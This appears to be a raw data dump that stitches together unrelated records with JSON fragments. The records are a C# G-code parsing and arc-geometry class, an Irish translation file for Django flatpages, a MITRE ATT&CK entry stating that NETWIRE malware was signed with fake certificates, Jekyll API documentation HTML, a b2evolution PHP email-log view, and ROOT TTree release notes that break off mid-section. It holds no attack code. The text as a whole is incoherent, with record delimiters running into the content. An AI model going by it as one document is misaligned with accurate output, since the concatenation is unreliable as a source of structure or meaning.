operator xyArcPoint(xyzabcuvwPoint tmp)\r\n { return new xyArcPoint(tmp.X, tmp.Y,0 ,0 ,0); }\r\n }\r\n\r\n /// \r\n /// Hold parsed GCode line and absolute work coordinate for given linenumber of GCode program\r\n /// \r\n class gcodeByLine\r\n { // ModalGroups\r\n public int lineNumber; // line number in fCTBCode\r\n public int figureNumber;\r\n public string codeLine; // copy of original gcode line\r\n public byte motionMode; // G0,1,2,3\r\n public bool isdistanceModeG90; // G90,91\r\n public bool ismachineCoordG53; // don't apply transform to machine coordinates\r\n public bool isSubroutine;\r\n public bool isSetCoordinateSystem; // don't process x,y,z if set coordinate system\r\n\r\n public byte spindleState; // M3,4,5\r\n public byte coolantState; // M7,8,9\r\n public int spindleSpeed; // actual spindle spped\r\n public int feedRate; // actual feed rate\r\n public double? x, y, z, a, b, c, u, v, w, i, j; // current parameters\r\n public xyzabcuvwPoint actualPos; // accumulates position\r\n public double alpha; // angle between old and this position\r\n public double distance; // distance to specific point\r\n public string otherCode;\r\n public string info;\r\n\r\n // Trace, Debug, Info, Warn, Error, Fatal\r\n private static readonly NLog.Logger Logger = NLog.LogManager.GetCurrentClassLogger();\r\n\r\n public gcodeByLine()\r\n { resetAll(); }\r\n public gcodeByLine(gcodeByLine tmp)\r\n {\r\n resetAll();\r\n lineNumber = tmp.lineNumber; figureNumber = tmp.figureNumber; codeLine = tmp.codeLine;\r\n motionMode = tmp.motionMode; isdistanceModeG90 = tmp.isdistanceModeG90; ismachineCoordG53 = tmp.ismachineCoordG53;\r\n isSubroutine = tmp.isSubroutine; spindleState = tmp.spindleState; coolantState = tmp.coolantState;\r\n spindleSpeed = tmp.spindleSpeed; feedRate = tmp.feedRate;\r\n x = tmp.x; y = tmp.y; z = tmp.z; i = tmp.i; j = tmp.j; a = tmp.a; b = tmp.b; c = tmp.c; u = tmp.u; v = tmp.v; w = tmp.w;\r\n actualPos = tmp.actualPos; distance = tmp.distance; alpha = tmp.alpha;\r\n isSetCoordinateSystem = tmp.isSetCoordinateSystem; otherCode = tmp.otherCode;\r\n }\r\n\r\n public string listData()\r\n { return string.Format(\"{0} mode {1} figure {2}\\r\", lineNumber, motionMode, figureNumber); }\r\n\r\n /// \r\n /// Reset coordinates and set G90, M5, M9\r\n /// \r\n public void resetAll()\r\n {\r\n lineNumber = 0; figureNumber = 0; codeLine = \"\";\r\n motionMode = 0; isdistanceModeG90 = true; ismachineCoordG53 = false; isSubroutine = false;\r\n isSetCoordinateSystem = false; spindleState = 5; coolantState = 9; spindleSpeed = 0; feedRate = 0;\r\n\r\n actualPos.X = 0; actualPos.Y = 0; actualPos.Z = 0; actualPos.A = 0; actualPos.B = 0; actualPos.C = 0;\r\n actualPos.U = 0; actualPos.V = 0; actualPos.W = 0;\r\n distance = -1; otherCode = \"\"; info = \"\"; alpha = 0;\r\n\r\n x = y = z = a = b = c = u = v = w = i = j = null;\r\n \r\n resetCoordinates();\r\n }\r\n public void resetAll(xyzPoint tmp)\r\n { resetAll();\r\n actualPos = new xyzabcuvwPoint( tmp);\r\n }\r\n /// \r\n /// Reset coordinates\r\n /// \r\n public void resetCoordinates()\r\n { x = null; y = null; z = null; a = null; b = null; c = null; u = null; v = null; w = null; i = null; j = null;\r\n }\r\n public void presetParsing(int lineNr, string line)\r\n { resetCoordinates();\r\n ismachineCoordG53 = false; isSubroutine = false;\r\n otherCode = \"\";\r\n lineNumber = lineNr;\r\n codeLine = line;\r\n }\r\n\r\n /// \r\n /// parse gcode line\r\n /// \r\n public void parseLine(int lineNr, string line, ref modalGroup modalState)\r\n {\r\n presetParsing(lineNr,line);\r\n char cmd = '\\0';\r\n string num = \"\";\r\n bool comment = false;\r\n double value = 0;\r\n line = line.ToUpper().Trim(); // 2020-07-26\r\n isSetCoordinateSystem = false;\r\n #region parse\r\n if ((!(line.StartsWith(\"$\") || line.StartsWith(\"(\"))) && (line.Length > 1))//do not parse grbl comments\r\n {\r\n try\r\n {\r\n foreach (char c in line)\r\n {\r\n if (c == ';') // comment?\r\n break;\r\n if (c == '(') // comment starts\r\n { comment = true; }\r\n if (!comment)\r\n {\r\n if (Char.IsLetter(c)) // if char is letter\r\n {\r\n if (cmd != '\\0') // and command is set\r\n {\r\n if (double.TryParse(num, System.Globalization.NumberStyles.Float, System.Globalization.NumberFormatInfo.InvariantInfo, out value))\r\n parseGCodeToken(cmd, value, ref modalState);\r\n }\r\n cmd = c; // char is a command\r\n num = \"\";\r\n }\r\n else if (Char.IsNumber(c) || c == '.' || c == '-') // char is not letter but number\r\n {\r\n num += c;\r\n }\r\n }\r\n\r\n if (c == ')') // comment ends\r\n { comment = false; }\r\n }\r\n if (cmd != '\\0') // finally after for-each process final command and number\r\n {\r\n if (double.TryParse(num, System.Globalization.NumberStyles.Float, System.Globalization.NumberFormatInfo.InvariantInfo, out value))\r\n parseGCodeToken(cmd, value, ref modalState);\r\n }\r\n }\r\n catch (Exception er) { Logger.Error(er, \"parseLine\"); }\r\n }\r\n #endregion\r\n if (isSetCoordinateSystem)\r\n resetCoordinates();\r\n }\r\n\r\n /// \r\n /// fill current gcode line structure\r\n /// \r\n private void parseGCodeToken(char cmd, double value, ref modalGroup modalState)\r\n {\r\n switch (Char.ToUpper(cmd))\r\n {\r\n case 'X':\r\n x = value;\r\n break;\r\n case 'Y':\r\n y = value;\r\n break;\r\n case 'Z':\r\n z = value;\r\n break;\r\n case 'A':\r\n a = value;\r\n break;\r\n case 'B':\r\n b = value;\r\n break;\r\n case 'C':\r\n c = value;\r\n break;\r\n case 'U':\r\n u = value;\r\n break;\r\n case 'V':\r\n v = value;\r\n break;\r\n case 'W':\r\n w = value;\r\n break;\r\n case 'I':\r\n i = value;\r\n break;\r\n case 'J':\r\n j = value;\r\n break;\r\n case 'F':\r\n modalState.feedRate = feedRate = (int)value;\r\n break;\r\n case 'S':\r\n modalState.spindleSpeed = spindleSpeed = (int)value;\r\n break;\r\n case 'G':\r\n if (value <= 3) // Motion Mode 0-3 c\r\n { modalState.motionMode = motionMode = (byte)value;\r\n if (value >= 2)\r\n modalState.containsG2G3 = true;\r\n }\r\n else\r\n { otherCode += \"G\"+((int)value).ToString()+\" \";\r\n }\r\n\r\n if (value == 10)\r\n { isSetCoordinateSystem = true; }\r\n\r\n else if ((value == 20) || (value == 21)) // Units Mode\r\n { modalState.unitsMode = (byte)value; }\r\n\r\n else if (value == 53) // move in machine coord.\r\n { ismachineCoordG53 = true; }\r\n\r\n else if ((value >= 54) && (value <= 59)) // Coordinate System Select\r\n { modalState.coordinateSystem = (byte)value; }\r\n\r\n else if (value == 90) // Distance Mode\r\n { modalState.distanceMode = (byte)value; modalState.isdistanceModeG90 = true; }\r\n else if (value == 91)\r\n { modalState.distanceMode = (byte)value; modalState.isdistanceModeG90 = false;\r\n modalState.containsG91 = true;\r\n }\r\n else if ((value == 93) || (value == 94)) // Feed Rate Mode\r\n { modalState.feedRateMode = (byte)value; }\r\n break;\r\n case 'M':\r\n if ((value < 3) || (value == 30)) // Program Mode 0, 1 ,2 ,30\r\n { modalState.programMode = (byte)value; }\r\n else if (value >= 3 && value <= 5) // Spindle State\r\n { modalState.spindleState = spindleState = (byte)value; }\r\n else if (value >= 7 && value <= 9) // Coolant State\r\n { modalState.coolantState = coolantState = (byte)value; }\r\n modalState.mWord = (byte)value;\r\n if ((value < 3) || (value > 9))\r\n otherCode += \"M\" + ((int)value).ToString() + \" \";\r\n break;\r\n case 'T':\r\n modalState.tool = (byte)value;\r\n otherCode += \"T\" + ((int)value).ToString() + \" \";\r\n break;\r\n case 'P':\r\n modalState.pWord = (int)value;\r\n otherCode += \"P\" + value.ToString() + \" \";\r\n break;\r\n case 'O':\r\n modalState.oWord = (int)value;\r\n break;\r\n case 'L':\r\n modalState.lWord = (int)value;\r\n break;\r\n }\r\n isdistanceModeG90 = modalState.isdistanceModeG90;\r\n }\r\n };\r\n\r\n class modalGroup\r\n {\r\n public byte motionMode; // G0, G1, G2, G3, //G38.2, G38.3, G38.4, G38.5, G80\r\n public byte coordinateSystem; // G54, G55, G56, G57, G58, G59\r\n public byte planeSelect; // G17, G18, G19\r\n public byte distanceMode; // G90, G91\r\n public byte feedRateMode; // G93, G94\r\n public byte unitsMode; // G20, G21\r\n public byte programMode; // M0, M1, M2, M30\r\n public byte spindleState; // M3, M4, M5\r\n public byte coolantState; // M7, M8, M9\r\n public byte tool; // T\r\n public int spindleSpeed; // S\r\n public int feedRate; // F\r\n public int mWord;\r\n public int pWord;\r\n public int oWord;\r\n public int lWord;\r\n public bool containsG2G3;\r\n public bool ismachineCoordG53;\r\n public bool isdistanceModeG90;\r\n public bool containsG91;\r\n\r\n public modalGroup() // reset state\r\n { reset(); }\r\n\r\n public void reset()\r\n { motionMode = 0; // G0, G1, G2, G3, G38.2, G38.3, G38.4, G38.5, G80\r\n coordinateSystem = 54; // G54, G55, G56, G57, G58, G59\r\n planeSelect = 17; // G17, G18, G19\r\n distanceMode = 90; // G90, G91\r\n feedRateMode = 94; // G93, G94\r\n unitsMode = 21; // G20, G21\r\n programMode = 0; // M0, M1, M2, M30\r\n spindleState = 5; // M3, M4, M5\r\n coolantState = 9; // M7, M8, M9\r\n tool = 0; // T\r\n spindleSpeed = 0; // S\r\n feedRate = 0; // F\r\n mWord = 0;\r\n pWord = 0;\r\n oWord = 0;\r\n lWord = 1;\r\n containsG2G3 = false;\r\n ismachineCoordG53 = false;\r\n isdistanceModeG90 = true;\r\n containsG91 = false;\r\n }\r\n public void resetSubroutine()\r\n { mWord = 0;\r\n pWord = 0;\r\n oWord = 0;\r\n lWord = 1;\r\n }\r\n }\r\n\r\n struct ArcProperties\r\n { public double angleStart, angleEnd, angleDiff, radius;\r\n public xyPoint center;\r\n };\r\n\r\n class gcodeMath\r\n { private static double precision = 0.00001;\r\n\r\n public static bool isEqual(System.Windows.Point a, System.Windows.Point b)\r\n { return ((Math.Abs(a.X - b.X) < precision) && (Math.Abs(a.Y - b.Y) < precision)); }\r\n public static bool isEqual(xyPoint a, xyPoint b)\r\n { return ((Math.Abs(a.X - b.X) < precision) && (Math.Abs(a.Y - b.Y) < precision)); }\r\n\r\n public static double distancePointToPoint(System.Windows.Point a, System.Windows.Point b)\r\n { return Math.Sqrt(((a.X - b.X) * (a.X - b.X)) + ((a.Y - b.Y) * (a.Y - b.Y))); }\r\n\r\n public static ArcProperties getArcMoveProperties(System.Windows.Point pOld, System.Windows.Point pNew, System.Windows.Point centerIJ, bool isG2)\r\n { return getArcMoveProperties(new xyPoint(pOld), new xyPoint(pNew), centerIJ.X, centerIJ.Y, isG2); }\r\n public static ArcProperties getArcMoveProperties(xyPoint pOld, xyPoint pNew, xyPoint center, bool isG2)\r\n { return getArcMoveProperties(pOld, pNew, pOld.X - center.X, pOld.Y - center.Y, isG2);}\r\n\r\n public static ArcProperties getArcMoveProperties(xyPoint pOld, xyPoint pNew, double? I, double? J, bool isG2)\r\n {\r\n ArcProperties tmp = getArcMoveAngle(pOld, pNew, I, J);\r\n if (!isG2) { tmp.angleDiff = Math.Abs(tmp.angleEnd - tmp.angleStart + 2 * Math.PI); }\r\n if (tmp.angleDiff > (2 * Math.PI)) { tmp.angleDiff -= (2 * Math.PI); }\r\n if (tmp.angleDiff < (-2 * Math.PI)) { tmp.angleDiff += (2 * Math.PI); }\r\n\r\n if ((pOld.X == pNew.X) && (pOld.Y == pNew.Y))\r\n { if (isG2) { tmp.angleDiff = -2 * Math.PI; }\r\n else { tmp.angleDiff = 2 * Math.PI; }\r\n }\r\n return tmp;\r\n }\r\n\r\n public static ArcProperties getArcMoveAngle(xyPoint pOld, xyPoint pNew, double? I, double? J)\r\n {\r\n ArcProperties tmp;\r\n\t\t\tif (I==null) {I=0;}\r\n\t\t\tif (J==null) {J=0;}\r\n double i = (double)I;\r\n double j = (double)J;\r\n tmp.radius = Math.Sqrt(i * i + j * j); // get radius of circle\r\n tmp.center.X = pOld.X + i;\r\n tmp.center.Y = pOld.Y + j;\r\n tmp.angleStart = tmp.angleEnd = tmp.angleDiff = 0;\r\n if (tmp.radius == 0)\r\n return tmp;\r\n\r\n double cos1 = i / tmp.radius;\r\n if (cos1 > 1) cos1 = 1;\r\n if (cos1 < -1) cos1 = -1;\r\n tmp.angleStart = Math.PI - Math.Acos(cos1);\r\n if (j > 0) { tmp.angleStart = -tmp.angleStart; }\r\n\r\n double cos2 = (tmp.center.X - pNew.X) / tmp.radius;\r\n if (cos2 > 1) cos2 = 1;\r\n if (cos2 < -1) cos2 = -1;\r\n tmp.angleEnd = Math.PI - Math.Acos(cos2);\r\n if ((tmp.center.Y - pNew.Y) > 0) { tmp.angleEnd = -tmp.angleEnd; }\r\n\r\n tmp.angleDiff = tmp.angleEnd - tmp.angleStart - 2 * Math.PI;\r\n return tmp;\r\n }\r\n\r\n public static double getAlpha(System.Windows.Point pOld, double P2x, double P2y)\r\n { return getAlpha(pOld.X, pOld.Y, P2x, P2y); }\r\n public static double getAlpha(System.Windows.Point pOld, System.Windows.Point pNew)\r\n { return getAlpha(pOld.X, pOld.Y, pNew.X, pNew.Y); }\r\n public static double getAlpha(xyPoint pOld, xyPoint pNew)\r\n { return getAlpha(pOld.X, pOld.Y, pNew.X, pNew.Y); }\r\n public static double getAlpha(double P1x, double P1y, double P2x, double P2y)\r\n {\r\n double s = 1, a = 0;\r\n double dx = P2x - P1x;\r\n double dy = P2y - P1y;\r\n if (dx == 0)\r\n {\r\n if (dy > 0)\r\n a = Math.PI / 2;\r\n else\r\n a = 3 * Math.PI / 2;\r\n if (dy == 0)\r\n return 0;\r\n }\r\n else if (dy == 0)\r\n {\r\n if (dx > 0)\r\n a = 0;\r\n else\r\n a = Math.PI;\r\n if (dx == 0)\r\n return 0;\r\n }\r\n else\r\n {\r\n s = dy / dx;\r\n a = Math.Atan(s);\r\n if (dx < 0)\r\n a += Math.PI;\r\n }\r\n return a;\r\n }\r\n\r\n public static double cutAngle=0, cutAngleLast=0, angleOffset = 0;\r\n public static void resetAngles()\r\n { angleOffset = cutAngle = cutAngleLast = 0.0; }\r\n public static double getAngle(System.Windows.Point a, System.Windows.Point b, double offset, int dir)\r\n { return monitorAngle(getAlpha(a, b) + offset, dir); }\r\n private static double monitorAngle(double angle, int direction)\t\t// take care of G2 cw G3 ccw direction\r\n { double diff = angle - cutAngleLast + angleOffset;\r\n if (direction == 2)\r\n { if (diff > 0) { angleOffset -= 2 * Math.PI; } } // clock wise, more negative\r\n else if (direction == 3)\r\n { if (diff < 0) { angleOffset += 2 * Math.PI; } } // counter clock wise, more positive\r\n else\r\n { if (diff > Math.PI)\r\n angleOffset -= 2 * Math.PI;\r\n if (diff < -Math.PI)\r\n angleOffset += 2 * Math.PI;\r\n }\r\n angle += angleOffset;\r\n return angle;\r\n }\r\n }\r\n}\r\n"} {"text": "# This file is distributed under the same license as the Django package.\n#\n# Translators:\n# Jannis Leidel , 2011.\n# Michael Thornhill , 2011, 2012.\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Django\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2012-03-23 02:37+0100\\n\"\n\"PO-Revision-Date: 2012-03-16 12:20+0000\\n\"\n\"Last-Translator: Michael Thornhill \\n\"\n\"Language-Team: Irish (http://www.transifex.net/projects/p/django/language/\"\n\"ga/)\\n\"\n\"Language: ga\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\"Plural-Forms: nplurals=5; plural=(n==1 ? 0 : n==2 ? 1 : n<7 ? 2 : n<11 ? 3 : \"\n\"4)\\n\"\n\n#: admin.py:10\nmsgid \"Advanced options\"\nmsgstr \"Ard-rogha\"\n\n#: forms.py:7 models.py:7\nmsgid \"URL\"\nmsgstr \"URL\"\n\n#: forms.py:8\nmsgid \"\"\n\"Example: '/about/contact/'. Make sure to have leading and trailing slashes.\"\nmsgstr \"\"\n\"Sampla '/about/contact/' Déan cinnte go bhfuil príomhslaid agus cúlslais \"\n\"agat.\"\n\n#: forms.py:10\nmsgid \"\"\n\"This value must contain only letters, numbers, dots, underscores, dashes, \"\n\"slashes or tildes.\"\nmsgstr \"\"\n\"Ní mór an luach a bhfuil ach litreacha, uimhreacha, poncanna, béim, dashes, \"\n\"slaiseanna nó thilde.\"\n\n#: forms.py:19\nmsgid \"URL is missing a leading slash.\"\nmsgstr \"Tá slais tosaigh in easnamh ag an URL.\"\n\n#: forms.py:23\nmsgid \"URL is missing a trailing slash.\"\nmsgstr \"Tá slais deireanach in easnamh ag an URL.\"\n\n#: forms.py:38\n#, python-format\nmsgid \"Flatpage with url %(url)s already exists for site %(site)s\"\nmsgstr \"Tá flatpage le url %(url)s ann cheana le suíomh %(site)s.\"\n\n#: models.py:8\nmsgid \"title\"\nmsgstr \"teideal\"\n\n#: models.py:9\nmsgid \"content\"\nmsgstr \"inneachar\"\n\n#: models.py:10\nmsgid \"enable comments\"\nmsgstr \"Cuir nótaí tráchta ar chumas\"\n\n#: models.py:11\nmsgid \"template name\"\nmsgstr \"ainm an teimpléid\"\n\n#: models.py:12\nmsgid \"\"\n\"Example: 'flatpages/contact_page.html'. If this isn't provided, the system \"\n\"will use 'flatpages/default.html'.\"\nmsgstr \"\"\n\"Sampla: 'flatpages/contact_page.html'. Muna bhfuil sé ar soláthair, bainfidh \"\n\"an córás úsáid as 'flatpages/default.html'.\"\n\n#: models.py:13\nmsgid \"registration required\"\nmsgstr \"clárúchán riachtanach\"\n\n#: models.py:13\nmsgid \"If this is checked, only logged-in users will be able to view the page.\"\nmsgstr \"\"\n\"Dá mbéadh é seo seicailte, ní beidh ach úsáideora logáilte isteach in ann an \"\n\"leathanach seo a fheiceail\"\n\n#: models.py:18\nmsgid \"flat page\"\nmsgstr \"leacleathanach\"\n\n#: models.py:19\nmsgid \"flat pages\"\nmsgstr \"leacleathanaigh\"\n"} {"text": "{\n \"type\": \"bundle\",\n \"id\": \"bundle--9b0f5428-a895-4ac3-bde7-4ee10acb8bd9\",\n \"spec_version\": \"2.0\",\n \"objects\": [\n {\n \"id\": \"relationship--add09428-6eda-4cb2-8817-008038ed4f00\",\n \"created_by_ref\": \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\",\n \"description\": \"The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)\",\n \"object_marking_refs\": [\n \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\"\n ],\n \"external_references\": [\n {\n \"source_name\": \"McAfee Netwire Mar 2015\",\n \"description\": \"McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.\",\n \"url\": \"https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/\"\n }\n ],\n \"source_ref\": \"malware--2a70812b-f1ef-44db-8578-a496a227aef2\",\n \"relationship_type\": \"uses\",\n \"target_ref\": \"attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082\",\n \"type\": \"relationship\",\n \"modified\": \"2020-03-16T17:21:37.008Z\",\n \"created\": \"2018-04-18T17:59:24.739Z\"\n }\n ]\n}"} {"text": "\n\n\n\n\n\nclass Jekyll::Tags::Link - jekyll-3.2.1 Documentation\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

class Jekyll::Tags::Link

\n\n
\n \n
\n\n \n \n \n
\n \n\n \n\n \n\n \n\n \n \n
\n

Public Class Methods

\n\n \n
\n \n
\n new(tag_name, relative_path, tokens)\n \n click to toggle source\n \n
\n \n\n
\n \n \n \n \n
\n Calls superclass method\n \n
\n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 10\ndef initialize(tag_name, relative_path, tokens)\n  super\n\n  @relative_path = relative_path.strip\nend
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
\n tag_name()\n \n click to toggle source\n \n
\n \n\n
\n \n \n \n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 5\ndef tag_name\n  self.name.split("::").last.downcase\nend
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
\n

Public Instance Methods

\n\n \n
\n \n
\n render(context)\n \n click to toggle source\n \n
\n \n\n
\n \n \n \n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 16\n      def render(context)\n        site = context.registers[:site]\n\n        site.docs_to_write.each do |document|\n          return document.url if document.relative_path == @relative_path\n        end\n\n        raise ArgumentError, <<eos\nCould not find document '#{@relative_path}' in tag '#{self.class.tag_name}'.\n\nMake sure the document exists and the path is correct.\neos\n      end
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
\n\n
\n\n\n\n\n"} {"text": " Email > Sent\n *\n * This file is part of the evoCore framework - {@link http://evocore.net/}\n * See also {@link https://github.com/b2evolution/b2evolution}.\n *\n * @license GNU GPL v2 - {@link http://b2evolution.net/about/gnu-gpl-license}\n *\n * @copyright (c)2003-2020 by Francois Planque - {@link http://fplanque.com/}\n *\n * @package admin\n */\nif( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page directly.' );\n\nglobal $edited_EmailLog, $admin_url;\n\n$Form = new Form( NULL, 'mail_log', 'post', 'compact' );\n\n$Form->global_icon( T_('Cancel viewing!'), 'close', regenerate_url( 'blog' ) );\n\n$Form->begin_form( 'fform', sprintf( T_('Mail log ID#%s'), $edited_EmailLog->ID ) );\n\n$Form->begin_line( T_('Result'), NULL );\n$result = emlog_result_info( $edited_EmailLog->result, array(), $edited_EmailLog->last_open_ts, $edited_EmailLog->last_click_ts );\n$result .= ' 'email', 'tab' => 'return', 'email' => $edited_EmailLog->to ) ).'\" class=\"'.button_class().' middle\" title=\"'.format_to_output( T_('Go to return log'), 'htmlattr' ).'\">'\n\t\t.get_icon( 'magnifier', 'imgtag', array( 'title' => T_('Go to return log') ) ).' '.T_('Returns').'';\n$Form->info_field( '', $result );\n$Form->end_line( NULL );\n\n\n$Form->info( T_('Date'), mysql2localedatetime_spans( $edited_EmailLog->timestamp ) );\n\n$deleted_user_note = '';\nif( $edited_EmailLog->user_ID > 0 )\n{\n\t$UserCache = & get_UserCache();\n\tif( $User = $UserCache->get_by_ID( $edited_EmailLog->user_ID, false ) )\n\t{\n\t\t$Form->info( T_('To User'), $User->get_identity_link() );\n\t}\n\telse\n\t{\n\t\t$deleted_user_note = '( '.T_( 'Deleted user' ).' )';\n\t}\n}\n\n$Form->begin_line( T_('To'), NULL );\n$to_address = htmlspecialchars($edited_EmailLog->to).$deleted_user_note;\n$to_address .= ' 'email', 'tab' => 'sent', 'email' => $edited_EmailLog->to ) ).'\" class=\"'.button_class().' middle\" title=\"'.format_to_output( T_('Go to return log'), 'htmlattr' ).'\">'\n\t\t.get_icon( 'magnifier', 'imgtag', array( 'title' => T_('Go to send log') ) ).' '.T_('Send Log').'';\n$Form->info_field( '', $to_address );\n$Form->end_line( NULL );\n\n$Form->info( T_('Subject'), '
'.htmlspecialchars($edited_EmailLog->subject).'
' );\n\n$Form->info( T_('Headers'), '
'.htmlspecialchars($edited_EmailLog->headers).'
' );\n\n$mail_contents = mail_log_parse_message( $edited_EmailLog->headers, $edited_EmailLog->message );\n\nif( !empty( $mail_contents ) )\n{\n\tif( !empty( $mail_contents['text'] ) )\n\t{ // Display Plain Text content\n\t\t$plain_text_content = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $mail_contents['text']['content'] );\n\t\t$plain_text_content = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $plain_text_content );\n\n\t\t$Form->info( T_('Text content'), $mail_contents['text']['type']\n\t\t\t\t.'
'.htmlspecialchars( $plain_text_content ).'
' );\n\t}\n\n\tif( !empty( $mail_contents['html'] ) )\n\t{ // Display HTML content\n\n\t\t$html_content = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $mail_contents['html']['content'] );\n\t\t$html_content = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $html_content );\n\n\t\tif( ! empty( $mail_contents['html']['head_style'] ) )\n\t\t{ // Print out all styles of email message\n\t\t\techo '';\n\t\t}\n\t\t$div_html_class = empty( $mail_contents['html']['body_class'] ) ? '' : ' '.$mail_contents['html']['body_class'];\n\t\t$div_html_style = empty( $mail_contents['html']['body_style'] ) ? '' : ' style=\"'.$mail_contents['html']['body_style'].'\"';\n\t\t$Form->info( T_('HTML content'), $mail_contents['html']['type']\n\t\t\t\t.'
'.$html_content.'
' );\n\t}\n}\n$emlog_message = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $edited_EmailLog->message );\n$emlog_message = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $emlog_message );\n$Form->info( T_('Raw email source'), '
'.htmlspecialchars( $emlog_message ).'
' );\n\n$Form->end_form();\n\n?>"} {"text": "
\n
\n\n

Tree

\n
    \n
  • Changed the MaxTreeSize default from 1.9 GBytes to 100 GBytes.
  • \n\n
  • Add new special functions in TTreeFormula (and hence TTree::Draw and TTree::Scan) to calculate the minimun and maximum with an entry:\n
      \n
    • Min$(formula),Max$(formula):
      return the minimun/maximum (within one TTree entry) of the value of the\n elements of the formula given as a parameter.
    • \n
    • MinIf$(formula,condition),MaxIf$(formula,condition):
      return the minimum (maximum) (within one TTree entry)\n of the value of the elements of the formula given as a parameter\n if they match the condition. If not element match the condition, the result is zero. To avoid the\n the result is zero. To avoid the consequent peak a zero, use the\n pattern:\n
      tree->Draw(\"MinIf$(formula,condition)\",\"condition\");
      \n which will avoid calculation MinIf$ for the entries that have no match\n for the condition.
    • \n
    \n
  • \n
  • Add support in TTreeFormula (and hence TTree::Draw and TTree::Scan) for the ternary condition operator ( cond ? if_expr : else_expr ).
  • \n
  • Significantly (by 2 order of magnitude) improved the performance of TTree::Draw calling C++ functions.
  • \n
  • Replace the function TSelectorDraw::MakeIndex and TSelectorDraw::GetNameByIndex\n with the function TSelectorDraw::SplitNames.
  • \n
  • Add a return value to SetBranchAddress, a return value greater or equal to zero indicate success, a negative\nvalue indicates failure (in both case, the address is still updated). Example:\n
    if (tree->SetBranchAddress(mybranch,&myvar) < 0) {\n   cerr << \"Something went wrong\\n\";\n   return;\n}
    \nThe possible return values are:
      \n
    • kMissingBranch (-5) : Missing branch
    • \n
    • kInternalError (-4) : Internal error (could not find the type corresponding to a data type number.
    • \n
    • kMissingCompiledCollectionProxy (-3) : Missing compiled collection proxy for a compiled collection.
    • \n
    • kMismatch (-2) : Non-Class Pointer type given does not match the type expected by the branch.
    • \n
    • kClassMismatch (-1) : Class Pointer type given does not match the type expected by the branch.
    • \n
    • kMatch (0) : perfect match.
    • \n
    • kMatchConversion (1) : match with (I/O) conversion.
    • \n
    • kMatchConversionCollection (2) : match with (I/O) conversion of the content of a collection.
    • \n
    • kMakeClass (3) : MakeClass mode so we can not check.
    • \n
    • kVoidPtr (4) : void* passed so no check was made.
    • \n
    • kNoCheck (5) : Underlying TBranch not yet available so no check was made.
    • \n
  • \n
  • Insure that the TTreeCloner (fast merging) is able to also copy 'uninitialized' TStreamerInfo describing abstract classes.
  • \n
  • Repair several use case of splitting collection of pointers (especially when their split level is 1).
  • \n
  • Several run-time performance improvements.
  • \n
  • In TTree::Fill use fZipBytes instead of fTotBytes for deciding when to flush or autosave.
  • \n
  • Properly handle TTree aliases containing array indices.
  • \n
  • Fix the default sorting order of baskets when the TTree is an older in-memory TTree.\nEnhance the sort order to use the 'entry number' when the seek position are equal.\nConsequently the default sort order for an older in-memory TTree is now\nessentially kSortBasketsByEntry rather than kSortBasketsByBranch (old 'correct' sort\norder) or 'random' (the 'broken' sort order prior to this release).
  • \n
\n

IMPORTANT enhancement in TTree::Fill:

\n

Slides from a recent seminar describing the main features of ROOT IO and Trees and the recent\nimprovements described below are available at\n http://root.cern.ch/files/brun_lcgapp09.pptx \nor\n http://root.cern.ch/files/brun_lcgapp09.pdf .

\n

The baskets are flushed and the Tree header saved at regular intervals (See AutoFlush and OptimizeBaskets)

\n\n

When the amount of data written so far (fTotBytes) is greater than fAutoFlush (see SetAutoFlush) all the baskets are flushed to disk.\nThis makes future reading faster as it guarantees that baskets belonging to nearby entries will be on the same disk region.

\n

When the first call to flush the baskets happens, we also take this opportunity to optimize the baskets buffers.\nWe also check if the number of bytes written is greater than fAutoSave (see SetAutoSave).\nIn this case we also write the Tree header. This makes the Tree recoverable up to this point in case the program writing the Tree crashes.

\n

Note that the user can also decide to call FlushBaskets and AutoSave in her event loop on the base of the number of events written instead of the number of bytes written.

\n\n

New function TTree::OptimizeBaskets

\n
\nvoid TTree::OptimizeBaskets(Int_t maxMemory, Float_t minComp, Option_t *option)\n
\n

This function may be called after having filled some entries in a Tree\nusing the information in the existing branch buffers, it will reassign\nnew branch buffer sizes to optimize time and memory.

\n\n

The function computes the best values for branch buffer sizes such that\nthe total buffer sizes is less than maxMemory and nearby entries written\nat the same time.\nIn case the branch compression factor for the data written so far is less\nthan compMin, the compression is disabled.\n\nif option =\"d\" an analysis report is printed.

\n\n

This function may also be called on an existing Tree to figure out the best values\ngiven the information in the Tree header

\n
\n   TFile f(\"myfile.root\");\n   TTree *T = (TTree*)f.Get(\"mytreename\");\n   T->Print();  //show the branch buffer sizes before optimization\n   T->OptimizeBaskets(10000000,1,\"d\");\n   T->Print();  //show the branch buffer sizes after optimization\n
\n\n

New interface functions to customize the TreeCache

\n
